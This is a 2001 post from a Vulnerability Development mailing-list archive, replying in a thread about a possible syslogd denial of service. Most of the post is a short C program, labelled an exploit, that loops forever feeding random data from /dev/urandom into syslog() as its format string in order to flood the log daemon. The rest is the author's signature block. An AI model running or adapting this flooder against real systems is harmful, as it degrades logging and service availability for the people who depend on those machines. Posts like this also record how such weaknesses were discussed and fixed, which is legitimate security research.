Vulnerability Development mailing list archives

Re: Possible syslogd DoS ?


From: Petr Baudis <pasky () pasky ji cz>
Date: Fri, 5 Oct 2001 07:19:27 +0200

/* uff, the correct code (exploit >:) should look like: */

#include <stdio.h>
#include <syslog.h>

int
main() 
{
  FILE *fp;
  char buffer[1024];
  
  printf("Starting DoS..\n");
  
  if((fp = fopen("/dev/urandom", "r")) == NULL)
  {
    printf("Error Opening /dev/urandom\n");
    exit(1);
  }
  
  for(;;)
  {
    fgets(buffer, sizeof(buffer), fp);
    syslog(0, buffer);
  }
    
  return 0;
}

-- 

                                Petr "Pasky" Baudis
.                                                                       .
        n = ((n >>  1) & 0x55555555) | ((n <<  1) & 0xaaaaaaaa);
        n = ((n >>  2) & 0x33333333) | ((n <<  2) & 0xcccccccc);
        n = ((n >>  4) & 0x0f0f0f0f) | ((n <<  4) & 0xf0f0f0f0);
        n = ((n >>  8) & 0x00ff00ff) | ((n <<  8) & 0xff00ff00);
        n = ((n >> 16) & 0x0000ffff) | ((n << 16) & 0xffff0000);
                -- C code which reverses the bits in a word.
.                                                                       .
My public PGP key is on: http://pasky.ji.cz/~pasky/pubkey.txt
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS d- s++:++ a--- C+++ UL++++$ P+ L+++ E--- W+ N !o K- w-- !O M-
!V PS+ !PE Y+ PGP+>++ t+ 5 X(+) R++ tv- b+ DI(+) D+ G e-> h! r% y?
------END GEEK CODE BLOCK------


Current thread: